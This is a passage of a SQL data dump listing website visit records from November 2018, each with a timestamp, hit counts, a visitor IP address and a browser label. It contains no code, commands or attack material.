,2,0,0,'54.36.148.145','other'),(336124,1542600430,1,1,0,0,'54.36.149.73','other'),(336125,1542600559,1,1,0,0,'54.36.148.68','other'),(336126,1542600589,1,1,0,0,'46.229.168.153','other'),(336127,1542600592,1,1,0,0,'46.229.168.129','other'),(336128,1542601035,1,1,0,0,'54.36.148.164','other'),(336129,1542601051,1,1,0,0,'54.36.148.116','other'),(336130,1542601651,1,1,0,0,'141.8.142.81','other'),(336131,1542601746,1,1,0,0,'54.36.148.102','other'),(336132,1542601877,1,1,0,0,'46.229.168.132','other'),(336133,1542601921,1,1,0,0,'54.36.148.154','other'),(336134,1542602216,4,4,0,0,'157.55.39.212','other'),(336135,1542602698,1,1,0,0,'54.36.148.149','other'),(336136,1542602937,1,1,0,0,'8.29.198.27','other'),(336137,1542603020,2,2,0,0,'207.46.13.172','other'),(336138,1542603209,1,1,0,0,'54.36.149.69','other'),(336139,1542603365,1,1,0,0,'54.36.148.151','other'),(336140,1542603600,1,1,0,0,'207.46.13.207','other'),(336141,1542603633,1,1,0,0,'54.36.149.104','other'),(336142,1542603720,3,3,0,0,'157.55.39.212','other'),(336143,1542603808,1,1,0,0,'54.36.149.32','other'),(336144,1542603812,4,4,0,0,'207.46.13.39','other'),(336145,1542603969,1,1,0,0,'54.36.148.73','other'),(336146,1542604405,1,1,0,0,'8.29.198.27','other'),(336147,1542604636,1,1,0,0,'54.36.149.64','other'),(336148,1542604993,1,1,0,0,'46.229.168.129','other'),(336149,1542604996,1,1,0,0,'46.229.168.145','other'),(336150,1542605057,1,1,0,0,'54.36.148.150','other'),(336151,1542605061,1,1,0,0,'8.29.198.25','other'),(336152,1542605507,2,2,0,0,'66.249.66.42','chrome'),(336153,1542605510,1,1,0,0,'54.36.148.210','other'),(336154,1542605710,1,1,0,0,'54.36.149.41','other'),(336155,1542605723,2,2,0,0,'207.46.13.39','other'),(336156,1542605796,1,1,0,0,'66.249.66.156','chrome'),(336157,1542606232,1,1,0,0,'54.36.148.60','other'),(336158,1542606280,1,1,0,0,'54.36.148.253','other'),(336159,1542606383,1,1,0,0,'54.36.148.41','other'),(336160,1542606478,2,2,0,0,'66.249.66.157','chrome'),(336162,1542606586,2,2,0,0,'66.249.66.154','chrome'),(336163,1542606638,2,2,0,0,'207.46.13.207','other'),(336164,1542606710,1,1,0,0,'54.36.148.47','other'),(336165,1542606838,2,2,0,0,'136.243.70.151','other'),(336166,1542606999,1,1,0,0,'178.255.215.94','other'),(336167,1542607261,1,1,0,0,'54.36.148.141','other'),(336168,1542607350,2,2,0,0,'207.46.13.172','other'),(336169,1542607447,1,1,0,0,'54.36.148.114','other'),(336170,1542607647,5,5,0,0,'178.154.244.11','other'),(336171,1542607914,1,1,0,0,'46.229.168.150','other'),(336172,1542607918,1,1,0,0,'46.229.168.149','other'),(336173,1542608272,1,1,0,0,'54.36.148.215','other'),(336174,1542608431,18,18,0,0,'178.154.244.29','other'),(336175,1542608629,18,18,0,0,'178.154.244.11','other'),(336176,1542608672,5,5,0,0,'5.45.207.79','other'),(336177,1542608819,1,1,0,0,'178.162.204.14','chrome'),(336178,1542609131,2,2,0,0,'207.46.13.39','other'),(336179,1542609301,2,2,0,0,'207.46.13.207','other'),(336180,1542609357,2,2,0,0,'5.45.207.19','other'),(336181,1542609439,13,13,0,0,'178.154.244.29','other'),(336182,1542609558,8,8,0,0,'178.154.244.11','other'),(336183,1542609559,1,1,0,0,'54.36.148.252','other'),(336184,1542609648,1,1,0,0,'54.36.148.195','other'),(336185,1542609678,3,3,0,0,'157.55.39.212','other'),(336186,1542609699,1,1,0,0,'54.36.149.68','other'),(336187,1542609777,1,1,0,0,'87.250.224.65','other'),(336188,1542609820,1,1,0,0,'54.36.148.168','other'),(336189,1542609879,1,1,0,0,'5.45.207.79','other'),(336190,1542609927,1,1,0,0,'54.36.148.92','other'),(336191,1542609971,1,1,0,0,'95.108.213.4','other'),(336192,1542609978,2,2,0,0,'162.210.196.98','other'),(336193,1542610006,1,1,0,0,'54.36.149.42','other'),(336194,1542610351,2,2,0,0,'207.46.13.39','other'),(336195,1542610610,2,2,0,0,'66.249.66.154','chrome'),(336196,1542610754,1,1,0,0,'54.36.148.139','other'),(336197,1542610800,1,1,0,0,'46.166.190.152','other'),(336198,1542610950,4,4,0,0,'157.55.39.212','other'),(336199,1542611040,1,1,0,0,'46.229.168.153','other'),(336200,1542611049,2,2,0,0,'207.46.13.172','other'),(336201,1542611377,1,1,0,0,'46.211.45.112','chrome'),(336202,1542611564,1,1,0,0,'5.45.207.79','other'),(336203,1542612117,1,1,0,0,'66.249.66.157','chrome'),(336204,1542612118,1,1,0,0,'66.249.66.156','chrome'),(336205,1542612309,4,4,0,0,'207.46.13.39','other'),(336206,1542612546,1,1,0,0,'54.36.148.77','other'),(336207,1542612605,1,1,0,0,'54.36.148.194','other'),(336208,1542612652,4,4,0,0,'207.46.13.172','other'),(336209,1542612657,1,1,0,0,'54.36.148.207','other'),(336210,1542612733,1,1,0,0,'54.36.149.78','other'),(336211,1542612762,2,2,0,0,'157.55.39.212','other'),(336212,1542612826,1,1,0,0,'54.36.149.0','other'),(336213,1542612864,2,2,0,0,'91.196.178.93','chrome'),(336214,1542612907,2,2,0,0,'207.46.13.207','other'),(336215,1542613008,2,2,0,0,'54.36.149.15','other'),(336216,1542613051,1,1,0,0,'54.36.148.180','other'),(336217,1542613152,1,1,0,0,'54.36.149.11','other'),(336218,1542613258,1,1,0,0,'66.249.66.156','chrome'),(336219,1542613294,1,1,0,0,'46.229.168.145','other'),(336220,1542613298,1,1,0,0,'46.229.168.151','other'),(336221,1542613408,1,1,0,0,'46.229.168.149','other'),(336222,1542613409,1,1,0,0,'54.36.148.98','other'),(336223,1542613412,1,1,0,0,'46.229.168.129','other'),(336224,1542613566,1,1,0,0,'46.229.168.136','other'),(336225,1542613598,5,5,0,0,'91.196.178.83','firefox'),(336226,1542613756,1,1,0,0,'54.36.148.10','other'),(336227,1542613780,1,1,0,0,'8.29.198.26','other'),(336228,1542613784,1,1,0,0,'54.36.148.206','other'),(336229,1542613932,1,1,0,0,'54.36.148.34','other'),(336230,1542614250,1,1,0,0,'54.36.148.236','other'),(336231,1542614343,1,1,0,0,'54.36.148.47','other'),(336232,1542614379,1,1,0,0,'54.36.148.170','other'),(336234,1542614401,1,1,0,0,'54.36.148.31','other'),(336235,1542614481,1,1,0,0,'54.36.148.134','other'),(336236,1542614488,2,2,0,0,'91.196.178.76','firefox'),(336237,1542614510,1,1,0,0,'54.36.148.125','other'),(336238,1542614632,1,1,0,0,'54.36.148.209','other'),(336239,1542614943,2,2,0,0,'207.46.13.207','other'),(336240,1542614989,1,1,0,0,'37.54.6.172','chrome'),(336241,1542615038,2,2,0,0,'91.196.178.93','chrome'),(336242,1542615095,2,2,0,0,'91.196.178.35','chrome'),(336243,1542615109,2,2,0,0,'194.44.45.123','chrome'),(336244,1542615203,2,2,0,0,'207.46.13.172','other'),(336245,1542615237,2,2,0,0,'8.29.198.25','other'),(336246,1542615254,1,1,0,0,'54.36.148.211','other'),(336247,1542615564,1,1,0,0,'46.229.168.150','other'),(336248,1542615568,1,1,0,0,'46.229.168.134','other'),(336249,1542615678,1,1,0,0,'54.36.149.32','other'),(336250,1542615679,1,1,0,0,'54.36.148.79','other'),(336251,1542615910,1,1,0,0,'46.229.168.130','other'),(336252,1542615911,1,1,0,0,'46.229.168.146','other'),(336253,1542615934,5,5,0,0,'207.46.13.207','other'),(336254,1542615991,1,1,0,0,'54.36.148.26','other'),(336255,1542616230,1,1,0,0,'66.249.66.154','chrome'),(336256,1542616307,1,1,0,0,'54.36.148.236','other'),(336257,1542616383,1,1,0,0,'54.36.148.223','other'),(336258,1542616461,2,2,0,0,'37.54.16.78','chrome'),(336259,1542616549,1,1,0,0,'207.46.13.39','other'),(336260,1542616562,1,1,0,0,'178.154.244.29','other'),(336261,1542616666,6,6,0,0,'80.254.155.43','chrome'),(336262,1542616746,1,1,0,0,'109.201.152.234','other'),(336263,1542616749,1,1,0,0,'54.36.148.233','other'),(336264,1542616804,1,1,0,0,'54.36.148.171','other'),(336265,1542616904,2,2,0,0,'207.46.13.172','other'),(336266,1542617020,1,1,0,0,'54.36.148.115','other'),(336267,1542617304,1,1,0,0,'54.36.148.30','other'),(336268,1542617420,1,1,0,0,'54.36.148.226','other'),(336269,1542617521,1,1,0,0,'54.36.148.113','other'),(336270,1542617573,1,1,0,0,'54.36.148.65','other'),(336271,1542617580,1,1,0,0,'46.63.65.101','chrome'),(336272,1542617844,2,2,0,0,'195.230.119.58','chrome'),(336273,1542617894,1,1,0,0,'54.36.149.54','other'),(336274,1542617904,1,1,0,0,'54.36.149.96','other'),(336275,1542618048,1,1,0,0,'66.249.66.152','chrome'),(336276,1542618101,2,2,0,0,'207.46.13.172','other'),(336277,1542618104,1,1,0,0,'69.58.2.59','chrome'),(336278,1542618183,2,2,0,0,'207.46.13.207','other'),(336279,1542618228,2,2,0,0,'66.249.66.156','chrome'),(336280,1542618335,1,1,0,0,'66.249.66.154','chrome'),(336281,1542618358,1,1,0,0,'54.36.148.35','other'),(336282,1542618473,1,1,0,0,'54.36.148.124','other'),(336283,1542618497,34,34,0,0,'54.234.228.185','other'),(336284,1542618611,1,1,0,0,'54.36.148.37','other'),(336285,1542618789,1,1,0,0,'54.36.149.36','other'),(336286,1542618902,1,1,0,0,'54.36.149.64','other'),(336287,1542619266,2,2,0,0,'130.180.217.39','chrome'),(336288,1542619267,1,1,0,0,'54.36.148.186','other'),(336289,1542619484,28,28,0,0,'54.234.228.185','other'),(336290,1542619571,10,10,0,0,'157.55.39.212','other'),(336291,1542619719,1,1,0,0,'95.163.255.64','other'),(336292,1542619722,1,1,0,0,'95.163.255.69','other'),(336293,1542619825,7,7,0,0,'207.46.13.207','other'),(336294,1542619902,1,1,0,0,'94.180.159.58','msie'),(336295,1542619903,1,1,0,0,'89.178.239.5','msie'),(336296,1542620030,9,9,0,0,'207.46.13.39','other'),(336297,1542620038,7,7,0,0,'207.46.13.172','other'),(336298,1542620270,1,1,0,0,'195.211.62.8','chrome'),(336299,1542620548,5,5,0,0,'157.55.39.212','other'),(336300,1542620602,32,32,0,0,'54.234.228.185','other'),(336301,1542620721,1,1,0,0,'54.36.148.133','other'),(336302,1542620852,1,1,0,0,'54.36.148.103','other'),(336303,1542621041,1,1,0,0,'54.36.148.91','other'),(336304,1542621170,6,6,0,0,'207.46.13.172','other'),(336305,1542621179,1,1,0,0,'54.36.148.234','other'),(336306,1542621244,2,2,0,0,'95.163.255.104','other'),(336307,1542621247,1,1,0,0,'95.163.255.107','other'),(336308,1542621279,1,1,0,0,'95.163.255.117','other'),(336309,1542621500,1,1,0,0,'66.249.66.42','chrome'),(336310,1542621510,22,22,0,0,'54.234.228.185','other'),(336311,1542621540,2,2,0,0,'207.46.13.207','other'),(336312,1542621595,1,1,0,0,'66.249.66.156','chrome'),(336313,1542621691,1,1,0,0,'54.36.148.136','other'),(336314,1542621800,2,2,0,0,'91.196.177.193','chrome'),(336315,1542621873,1,1,0,0,'66.249.66.152','chrome'),(336316,1542622203,4,4,0,0,'157.55.39.212','other'),(336317,1542622224,1,1,0,0,'194.44.45.123','chrome'),(336318,1542622523,1,1,0,0,'46.229.168.149','other'),(336319,1542622528,1,1,0,0,'46.229.168.139','other'),(336320,1542622600,18,18,0,0,'54.234.228.185','other'),(336321,1542622914,2,2,0,0,'62.122.202.221','firefox'),(336322,1542623112,1,1,0,0,'218.30.103.145','other'),(336323,1542623169,1,1,0,0,'54.36.148.87','other'),(336324,1542623303,1,1,0,0,'46.166.137.213','other'),(336325,1542623330,1,1,0,0,'54.36.149.85','other'),(336326,1542623479,1,1,0,0,'54.36.149.89','other'),(336327,1542623510,1,1,0,0,'54.36.148.203','other'),(336328,1542623525,12,12,0,0,'54.234.228.185','other'),(336329,1542623583,2,2,0,0,'93.75.220.203','firefox'),(336330,1542623642,1,1,0,0,'54.36.149.47','other'),(336331,1542623817,1,1,0,0,'54.36.148.138','other'),(336332,1542623832,2,2,0,0,'207.46.13.172','other'),(336333,1542623954,1,1,0,0,'66.249.66.154','chrome'),(336334,1542624264,2,2,0,0,'207.46.13.207','other'),(336335,1542624273,2,2,0,0,'207.46.13.39','other'),(336336,1542624338,4,4,0,0,'157.55.39.212','other'),(336337,1542624430,1,1,0,0,'178.95.246.220','chrome'),(336338,1542624524,1,1,0,0,'46.229.168.141','other'),(336339,1542624613,1,1,0,0,'8.29.198.25','other'),(336340,1542625294,1,1,0,0,'95.163.255.113','other'),(336341,1542625298,1,1,0,0,'95.163.255.117','other'),(336342,1542625439,1,1,0,0,'178.92.248.212','chrome'),(336343,1542625474,1,1,0,0,'54.36.149.86','other'),(336344,1542625492,1,1,0,0,'46.164.130.92','chrome'),(336345,1542625581,3,3,0,0,'157.55.39.212','other'),(336346,1542625589,1,1,0,0,'46.229.168.140','other'),(336347,1542625633,1,1,0,0,'54.36.149.62','other'),(336348,1542625772,1,1,0,0,'66.249.66.156','chrome'),(336349,1542626079,1,1,0,0,'8.29.198.27','other'),(336350,1542626316,1,1,0,0,'54.36.149.90','other'),(336351,1542626339,1,1,0,0,'54.36.148.124','other'),(336352,1542626527,2,2,0,0,'207.46.13.172','other'),(336353,1542626709,1,1,0,0,'54.36.149.87','other'),(336354,1542626747,1,1,0,0,'8.29.198.26','other'),(336355,1542626790,1,1,0,0,'5.58.95.49','chrome'),(336356,1542626813,1,1,0,0,'157.55.39.222','other'),(336357,1542626829,2,2,0,0,'66.249.66.155','chrome'),(336359,1542626868,1,1,0,0,'54.36.148.242','other'),(336360,1542626945,2,2,0,0,'66.249.66.44','chrome'),(336361,1542626990,4,4,0,0,'5.58.93.98','other'),(336362,1542626998,1,1,0,0,'54.36.149.95','other'),(336363,1542627029,1,1,0,0,'37.55.176.83','firefox'),(336364,1542627100,1,1,0,0,'54.36.148.181','other'),(336365,1542627765,1,1,0,0,'54.36.148.35','other'),(336366,1542627829,1,1,0,0,'54.36.148.125','other'),(336367,1542627845,9,9,0,0,'178.154.244.11','other'),(336368,1542627848,15,15,0,0,'178.154.244.29','other'),(336369,1542628156,1,1,0,0,'66.249.66.40','chrome'),(336370,1542628209,1,1,0,0,'54.36.148.166','other'),(336371,1542628261,3,3,0,0,'5.45.207.79','other'),(336372,1542628316,1,1,0,0,'5.45.207.19','other'),(336373,1542628403,2,2,0,0,'207.46.13.172','other'),(336374,1542628464,1,1,0,0,'54.36.148.171','other'),(336375,1542628562,1,1,0,0,'54.36.149.104','other'),(336376,1542628722,1,1,0,0,'54.36.148.128','other'),(336377,1542628778,7,7,0,0,'178.154.244.11','other'),(336378,1542628840,13,13,0,0,'178.154.244.29','other'),(336379,1542628954,1,1,0,0,'66.249.66.44','chrome'),(336380,1542628985,1,1,0,0,'54.36.148.91','other'),(336381,1542629557,1,1,0,0,'54.36.148.197','other'),(336382,1542629575,1,1,0,0,'5.45.207.19','other'),(336383,1542629731,1,1,0,0,'5.58.93.98','msie'),(336384,1542629842,1,1,0,0,'54.36.148.56','other'),(336385,1542629944,2,2,0,0,'207.46.13.172','other'),(336386,1542629999,1,1,0,0,'178.154.244.29','other'),(336387,1542630170,2,2,0,0,'37.54.23.119','chrome'),(336388,1542630174,3,3,0,0,'157.55.39.222','other'),(336389,1542630362,1,1,0,0,'54.36.148.31','other'),(336390,1542630473,1,1,0,0,'54.36.148.124','other'),(336391,1542630480,1,1,0,0,'54.36.148.65','other'),(336392,1542630649,2,2,0,0,'157.55.39.212','other'),(336393,1542630694,1,1,0,0,'87.250.224.47','other'),(336394,1542630827,1,1,0,0,'93.75.220.203','msie'),(336395,1542630944,6,6,0,0,'207.46.13.39','other'),(336396,1542630989,1,1,0,0,'54.36.149.93','other'),(336397,1542631203,1,1,0,0,'66.249.66.42','chrome'),(336398,1542631236,1,1,0,0,'54.36.149.13','other'),(336399,1542631282,4,4,0,0,'157.55.39.222','other'),(336400,1542631357,1,1,0,0,'54.36.149.5','other'),(336401,1542631440,1,1,0,0,'54.36.148.171','other'),(336402,1542631511,1,1,0,0,'37.9.113.38','other'),(336403,1542631635,1,1,0,0,'180.76.15.136','other'),(336404,1542631636,1,1,0,0,'180.76.15.12','other'),(336405,1542631677,1,1,0,0,'54.36.148.14','other'),(336406,1542631761,2,2,0,0,'95.132.54.44','firefox'),(336407,1542631850,1,1,0,0,'54.36.148.52','other'),(336408,1542631900,1,1,0,0,'46.229.168.146','other'),(336409,1542631954,1,1,0,0,'54.36.148.223','other'),(336410,1542632234,1,1,0,0,'178.154.244.29','other'),(336411,1542632248,1,1,0,0,'54.36.149.51','other'),(336412,1542632251,1,1,0,0,'130.180.220.202','chrome'),(336413,1542632284,1,1,0,0,'95.108.213.50','other'),(336414,1542632655,2,2,0,0,'91.196.178.93','chrome'),(336415,1542632673,2,2,0,0,'91.196.178.189','chrome'),(336416,1542632741,1,1,0,0,'54.36.148.64','other'),(336417,1542632770,1,1,0,0,'54.36.148.232','other'),(336418,1542632990,1,1,0,0,'54.36.148.239','other'),(336419,1542633181,1,1,0,0,'128.0.104.250','chrome'),(336420,1542633211,2,2,0,0,'178.154.244.11','other'),(336421,1542633485,1,1,0,0,'54.36.148.186','other'),(336422,1542633499,1,1,0,0,'54.36.149.99','other'),(336423,1542633578,1,1,0,0,'54.36.148.87','other'),(336424,1542633592,1,1,0,0,'54.36.148.32','other'),(336425,1542633605,1,1,0,0,'62.210.83.78','firefox'),(336426,1542633677,1,1,0,0,'54.36.149.21','other'),(336427,1542633804,2,2,0,0,'77.111.247.154','chrome'),(336428,1542633865,1,1,0,0,'178.255.215.94','other'),(336429,1542633905,1,1,0,0,'54.36.148.123','other'),(336430,1542633926,1,1,0,0,'54.36.148.139','other'),(336431,1542633930,1,1,0,0,'5.45.207.79','other'),(336432,1542634193,1,1,0,0,'158.69.54.207','other'),(336433,1542634275,3,3,0,0,'91.124.182.170','firefox'),(336434,1542634314,1,1,0,0,'91.196.178.130','chrome'),(336435,1542634553,1,1,0,0,'66.249.66.154','chrome'),(336436,1542634855,1,1,0,0,'95.163.255.92','other'),(336437,1542634858,1,1,0,0,'95.163.255.95','other'),(336438,1542635175,1,1,0,0,'46.229.168.135','other'),(336439,1542635178,1,1,0,0,'46.229.168.139','other'),(336440,1542635253,1,1,0,0,'54.36.148.104','other'),(336441,1542635280,1,1,0,0,'157.55.39.222','other'),(336442,1542635415,1,1,0,0,'54.36.148.137','other'),(336443,1542635448,1,1,0,0,'8.29.198.25','other'),(336444,1542635503,1,1,0,0,'37.9.113.103','other'),(336445,1542635579,1,1,0,0,'54.36.149.86','other'),(336446,1542635755,1,1,0,0,'46.229.168.151','other'),(336447,1542635758,1,1,0,0,'54.36.148.139','other'),(336448,1542635810,1,1,0,0,'54.36.149.10','other'),(336449,1542635940,1,1,0,0,'54.36.148.154','other'),(336450,1542635949,2,2,0,0,'91.196.178.93','chrome'),(336451,1542636037,1,1,0,0,'46.229.168.141','other'),(336452,1542636658,1,1,0,0,'66.249.66.154','chrome'),(336453,1542636660,1,1,0,0,'54.36.148.60','other'),(336454,1542636687,1,1,0,0,'157.55.39.212','other'),(336455,1542636855,1,1,0,0,'157.55.39.222','other'),(336456,1542636932,2,2,0,0,'8.29.198.27','other'),(336457,1542637059,1,1,0,0,'66.249.66.155','chrome'),(336458,1542637060,1,1,0,0,'66.249.66.152','chrome'),(336459,1542637155,1,1,0,0,'54.36.148.124','other'),(336460,1542637186,1,1,0,0,'95.135.235.229','msie'),(336461,1542637219,2,2,0,0,'91.196.178.132','firefox'),(336462,1542637221,1,1,0,0,'54.36.149.65','other'),(336463,1542637278,2,2,0,0,'46.229.168.135','other'),(336464,1542637346,1,1,0,0,'141.8.142.144','other'),(336465,1542637560,1,1,0,0,'54.36.148.238','other'),(336466,1542637630,1,1,0,0,'207.46.13.172','other'),(336467,1542637897,1,1,0,0,'54.36.149.4','other'),(336468,1542637926,2,2,0,0,'178.154.244.29','other'),(336469,1542638004,1,1,0,0,'207.46.13.39','other'),(336470,1542638076,1,1,0,0,'157.55.39.212','other'),(336471,1542638249,1,1,0,0,'54.36.148.157','other'),(336472,1542638607,1,1,0,0,'54.36.148.59','other'),(336473,1542638634,1,1,0,0,'54.36.148.26','other'),(336474,1542638668,3,3,0,0,'95.132.15.154','chrome'),(336475,1542638731,1,1,0,0,'207.46.13.172','other'),(336476,1542638886,1,1,0,0,'54.36.148.57','other'),(336477,1542638903,1,1,0,0,'54.36.148.139','other'),(336478,1542639133,1,1,0,0,'54.36.148.195','other'),(336479,1542639325,1,1,0,0,'157.55.39.212','other'),(336480,1542639583,2,2,0,0,'91.124.182.170','firefox'),(336481,1542639832,1,1,0,0,'54.36.148.23','other'),(336482,1542639885,1,1,0,0,'46.229.168.134','other'),(336483,1542639893,1,1,0,0,'46.229.168.146','other'),(336484,1542640005,2,2,0,0,'37.54.16.78','chrome'),(336485,1542640316,2,2,0,0,'207.46.13.172','other'),(336486,1542640475,1,1,0,0,'91.196.178.134','chrome'),(336487,1542640672,1,1,0,0,'54.36.149.75','other'),(336488,1542640702,1,1,0,0,'54.36.148.81','other'),(336489,1542640845,1,1,0,0,'54.36.149.13','other'),(336490,1542640896,1,1,0,0,'157.55.39.212','other'),(336491,1542640902,1,1,0,0,'95.163.255.107','other'),(336492,1542640910,1,1,0,0,'95.163.255.119','other'),(336493,1542641020,2,2,0,0,'91.196.178.75','firefox'),(336494,1542641228,1,1,0,0,'54.36.149.50','other'),(336495,1542641282,1,1,0,0,'207.46.13.39','other'),(336496,1542641287,1,1,0,0,'157.55.39.222','other'),(336497,1542641335,2,2,0,0,'192.99.35.135','chrome'),(336498,1542641385,1,1,0,0,'66.249.66.152','chrome'),(336499,1542641757,1,1,0,0,'54.36.149.93','other'),(336500,1542641900,1,1,0,0,'66.249.66.154','chrome'),(336501,1542641913,1,1,0,0,'54.36.149.78','other'),(336502,1542642295,1,1,0,0,'46.229.168.140','other'),(336503,1542642298,1,1,0,0,'54.36.149.25','other'),(336504,1542642302,1,1,0,0,'46.229.168.133','other'),(336505,1542642544,1,1,0,0,'207.46.13.172','other'),(336506,1542642991,1,1,0,0,'46.229.168.150','other'),(336507,1542642994,1,1,0,0,'46.229.168.129','other'),(336508,1542643073,1,1,0,0,'46.229.168.145','other'),(336509,1542643204,1,1,0,0,'66.249.66.154','chrome'),(336510,1542643343,1,1,0,0,'54.36.148.11','other'),(336511,1542643358,1,1,0,0,'93.78.232.42','chrome'),(336512,1542643369,1,1,0,0,'54.36.148.143','other'),(336513,1542643389,2,2,0,0,'91.196.178.174','chrome'),(336514,1542643703,1,1,0,0,'54.36.149.64','other'),(336515,1542644139,1,1,0,0,'54.36.149.33','other'),(336516,1542644152,1,1,0,0,'46.229.168.142','other'),(336517,1542644154,1,1,0,0,'46.229.168.146','other'),(336518,1542644333,1,1,0,0,'54.36.148.107','other'),(336519,1542644670,1,1,0,0,'54.36.148.16','other'),(336520,1542644806,1,1,0,0,'54.36.148.91','other'),(336521,1542644836,1,1,0,0,'54.36.149.77','other'),(336522,1542645000,1,1,0,0,'66.249.66.154','chrome'),(336523,1542645008,1,1,0,0,'107.21.1.8','other'),(336524,1542645010,1,1,0,0,'54.208.102.37','other'),(336525,1542645120,1,1,0,0,'46.229.168.144','other'),(336526,1542645123,1,1,0,0,'46.229.168.145','other'),(336527,1542645275,1,1,0,0,'66.249.66.156','chrome'),(336528,1542645631,1,1,0,0,'46.229.168.138','other'),(336529,1542645783,1,1,0,0,'66.249.66.157','chrome'),(336530,1542645784,1,1,0,0,'66.249.66.152','chrome'),(336531,1542646113,1,1,0,0,'54.36.148.173','other'),(336532,1542646207,1,1,0,0,'54.36.148.244','other'),(336533,1542646246,1,1,0,0,'54.36.148.135','other'),(336534,1542646300,1,1,0,0,'8.29.198.26','other'),(336535,1542646545,1,1,0,0,'93.78.185.135','chrome'),(336536,1542646742,1,1,0,0,'157.55.39.212','other'),(336537,1542646967,1,1,0,0,'54.36.149.6','other'),(336538,1542647131,1,1,0,0,'54.36.148.240','other'),(336539,1542647140,1,1,0,0,'54.36.149.37','other'),(336540,1542647194,1,1,0,0,'54.36.148.197','other'),(336541,1542647252,1,1,0,0,'157.55.39.192','other'),(336542,1542647254,1,1,0,0,'93.78.184.243','opera'),(336543,1542647375,1,1,0,0,'66.249.66.154','chrome'),(336544,1542647401,1,1,0,0,'54.36.149.39','other'),(336545,1542647544,1,1,0,0,'54.36.148.120','other'),(336546,1542647769,1,1,0,0,'8.29.198.25','other'),(336547,1542647932,1,1,0,0,'54.36.148.254','other'),(336548,1542648094,1,1,0,0,'54.36.148.17','other'),(336549,1542648186,1,1,0,0,'54.36.149.58','other'),(336550,1542648253,1,1,0,0,'54.36.148.35','other'),(336551,1542648292,1,1,0,0,'54.36.148.89','other'),(336552,1542648335,5,5,0,0,'178.154.244.29','other'),(336553,1542648336,1,1,0,0,'178.154.244.11','other'),(336554,1542648427,1,1,0,0,'8.29.198.26','other'),(336555,1542648593,1,1,0,0,'66.249.66.154','chrome'),(336556,1542648629,1,1,0,0,'54.36.148.62','other'),(336557,1542648666,1,1,0,0,'54.36.148.68','other'),(336558,1542648728,1,1,0,0,'146.120.225.240','firefox'),(336559,1542648735,1,1,0,0,'54.36.148.186','other'),(336560,1542648765,1,1,0,0,'54.36.149.10','other'),(336561,1542649087,1,1,0,0,'37.9.113.148','other'),(336562,1542649264,7,7,0,0,'178.154.244.29','other'),(336563,1542649393,1,1,0,0,'54.36.149.25','other'),(336564,1542649484,1,1,0,0,'91.196.178.71','chrome'),(336565,1542649517,1,0,1,0,'66.249.66.156',''),(336566,1542649602,1,1,0,0,'157.55.39.192','other'),(336567,1542649746,1,0,1,0,'66.249.66.42',''),(336568,1542649769,1,1,0,0,'54.36.148.26','other'),(336569,1542649802,2,2,0,0,'46.211.131.96','chrome'),(336570,1542649856,3,3,0,0,'178.154.244.11','other'),(336571,1542649950,1,1,0,0,'93.78.185.135','chrome'),(336572,1542650500,1,1,0,0,'46.229.168.144','other'),(336573,1542650503,1,1,0,0,'95.108.213.4','other'),(336574,1542650509,1,1,0,0,'46.229.168.142','other'),(336575,1542650561,2,2,0,0,'178.154.244.29','other'),(336576,1542650594,1,1,0,0,'46.229.168.152','other'),(336577,1542650931,1,1,0,0,'209.90.225.43','chrome'),(336578,1542651123,1,1,0,0,'46.229.168.143','other'),(336579,1542651129,1,1,0,0,'46.229.168.140','other'),(336580,1542651157,1,1,0,0,'66.249.66.152','chrome'),(336581,1542651180,1,1,0,0,'54.36.149.90','other'),(336582,1542651230,1,1,0,0,'54.36.149.73','other'),(336583,1542651485,1,1,0,0,'77.47.172.33','firefox'),(336584,1542652192,1,1,0,0,'46.172.82.3','firefox'),(336585,1542652249,1,1,0,0,'54.36.148.209','other'),(336586,1542652336,2,2,0,0,'66.249.66.152','chrome'),(336587,1542652366,1,1,0,0,'54.36.149.5','other'),(336588,1542652405,1,0,1,0,'66.249.66.44',''),(336589,1542652642,1,1,0,0,'46.229.168.143','other'),(336590,1542652645,1,1,0,0,'46.229.168.132','other'),(336591,1542652942,1,1,0,0,'66.249.66.157','chrome'),(336592,1542653373,1,1,0,0,'54.36.148.86','other'),(336593,1542653526,1,1,0,0,'54.36.148.10','other'),(336594,1542653586,1,1,0,0,'46.229.168.137','other'),(336595,1542653830,1,1,0,0,'54.36.149.98','other'),(336596,1542653914,1,1,0,0,'91.196.178.101','chrome'),(336597,1542653919,1,1,0,0,'46.229.168.148','other'),(336598,1542653958,1,1,0,0,'198.211.105.109','other'),(336599,1542654090,1,1,0,0,'54.36.149.50','other'),(336600,1542654273,1,1,0,0,'54.36.148.17','other'),(336601,1542655049,1,1,0,0,'109.201.152.3','other'),(336602,1542655321,1,1,0,0,'54.36.149.52','other'),(336603,1542655447,1,1,0,0,'46.229.168.150','other'),(336604,1542655449,1,1,0,0,'46.229.168.132','other'),(336605,1542655497,1,1,0,0,'54.36.148.52','other'),(336606,1542655580,2,1,1,0,'66.249.66.152',''),(336607,1542655697,1,1,0,0,'54.36.149.65','other'),(336608,1542655793,4,1,3,0,'66.249.66.154',''),(336609,1542655971,1,1,0,0,'46.229.168.151','other'),(336610,1542656114,1,1,0,0,'54.36.148.174','other'),(336611,1542656134,1,1,0,0,'54.36.148.131','other'),(336612,1542656245,1,1,0,0,'46.211.55.156','chrome'),(336613,1542656313,1,1,0,0,'66.249.66.40','chrome'),(336614,1542656407,1,1,0,0,'46.229.168.146','other'),(336615,1542656607,1,1,0,0,'91.196.178.186','chrome'),(336616,1542656691,1,1,0,0,'54.36.149.57','other'),(336617,1542656812,1,1,0,0,'54.36.148.124','other'),(336618,1542656881,1,1,0,0,'46.229.168.148','other'),(336619,1542656885,2,2,0,0,'46.229.168.147','other'),(336620,1542657133,1,1,0,0,'8.29.198.26','other'),(336621,1542657429,1,1,0,0,'188.231.221.45','firefox'),(336622,1542657572,1,1,0,0,'46.229.168.129','other'),(336623,1542657579,1,1,0,0,'54.36.149.49','other'),(336624,1542657805,1,1,0,0,'46.229.168.132','other'),(336625,1542657806,2,2,0,0,'66.249.66.156','chrome'),(336626,1542657928,1,1,0,0,'93.78.184.53','firefox'),(336627,1542658055,1,1,0,0,'93.78.232.42','chrome'),(336628,1542658057,1,1,0,0,'93.76.237.121','msie'),(336629,1542658127,1,1,0,0,'66.249.66.154','chrome'),(336630,1542658349,3,3,0,0,'178.154.244.11','other'),(336631,1542658388,1,1,0,0,'178.154.244.29','other'),(336632,1542658608,1,1,0,0,'8.29.198.27','other'),(336633,1542658856,1,1,0,0,'54.36.148.110','other'),(336634,1542658939,1,1,0,0,'46.211.9.216','chrome'),(336635,1542659067,1,1,0,0,'46.211.106.195','chrome'),(336636,1542659072,1,1,0